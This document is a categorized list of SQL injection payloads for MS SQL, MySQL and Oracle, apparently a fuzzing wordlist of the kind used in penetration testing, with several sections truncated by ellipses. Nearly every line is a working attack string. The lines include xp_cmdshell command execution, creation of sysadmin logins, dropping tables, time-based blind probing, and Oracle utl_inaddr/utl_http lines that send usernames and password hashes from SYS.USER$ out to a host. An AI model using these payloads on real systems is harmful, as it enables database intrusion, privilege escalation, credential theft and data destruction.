Active SQL Injection
  1: '; exec master..xp_cmdshell 'ping 10.10.1.2'--
  2: create user name identified by 'pass123'
  3: create user name identified by pass123 temporary tablespace temp default tablespace users; 
  4: ' ; drop table temp --
  5: exec sp_addlogin 'name' , 'password'
  6: exec sp_addsrvrolemember 'name' , 'sysadmin'
  7: insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
  8: grant connect to name; grant resource to name;
  9: insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

MS SQL Injection i
  1: a
  2: ' or 1=1 --
  3: ' union (select @@version) --
  4: ' union (select NULL, (select @@version)) --
  5: ' union (select NULL, NULL, (select @@version)) --
  6: ' union (select NULL, NULL, NULL,  (select @@version)) --
  7: ' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
  8: ' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

MS SQL Ninja Injection (Blind)
  1: a
  2: '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
  3: '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
  4: '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
  5: '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
  6: '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
  7: '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
  8: '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
  9: '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

MySQL Injection (Blind)
  1: 1
  2: 1'1
  3: 1 exec sp_ (or exec xp_)
  4: 1 and 1=1
  5: 1' and 1=(select count(*) from tablenames); --

MySQL Injection 101
  1: a
  2: 1 or 1=1
  3: 1' or '1'='1
  4: 1 and user_name() = 'dbo'

MySQL/MS SQL Common Injection
  1: 1
  2: 1 and user_name() = 'dbo'
  3: \'; desc users; --
  4: 1\'1
  5: 1' and non_existant_table = '1
  6: ' or username is not NULL or username = '
  7: 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
  8: 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
  9: 1 uni/**/on select all from where

Oracle SQL Injection
  1:  or 1=1
  2: ' or '1'='1
  3: '||utl_http.request('httP://192.168.1.1/')||'
  4: ' || myappadmin.adduser('admin', 'newpass') || '
  5: ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
  6: ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
  7: ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
  8: ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
  9: ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
  10: ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
  11: ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
  12: ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
  13: ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
  14: ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
  15: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
  16: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
  17: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
  18: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
  19: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
  20: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
  21: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
  22: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
  23: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
  24: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
  25: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
  26: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
  27: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
  28: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
  29: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
  30: ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
  ...

Passive SQL Injection
  1: '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
  2: ||6
  3: '||'6
  4: (||6)
  5: ' or 1=1-- 
  6: or 1=1
  7: ' or '1'='1
  8: ; or '1'='1'
  9: " or isNULL(1/0) /*
  10: ' or '7659'='7659
  11: " or isNULL(1/0) /*
  12: ' -- 
  13: ' or 1=1--
  14: " or 1=1--
  15: ' or 1=1 /*
  16: or 1=1--
  17: ' or 'a'='a
  18: " or "a"="a
  19: ') or ('a'='a
  20: admin' or '
  21: ' select * from information_schema.tables--
  22: ) union select * from information_schema.tables;
  23: ' having 1=1--
  24: ' having 1=1--
  25: ' group by userid having 1=1--
  26: ' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
  27: ' or 1 in (select @@version)--
  28: ' union all select @@version--
  29: ' or 'unusual' = 'unusual'
  30: ' or 'something' = 'some'+'thing'
  ...

SQL Injection
  1: a
  2: a' 
  3: a' --
  4: a' or 1=1; --
  5: @
  6: ?
  7: ' and 1=0) union all
  8: ? or 1=1 --
  9: x' and userid is NULL; --
  10: x' and email is NULL; --
  11: anything' or 'x'='x
  12: x' and 1=(select count(*) from tabname); --
  13: x' and members.email is NULL; --
  14: x' or full_name like '%bob%
  15: 23 or 1=1; --
  16: '; exec master..xp_cmdshell 'ping 172.10.1.255'--

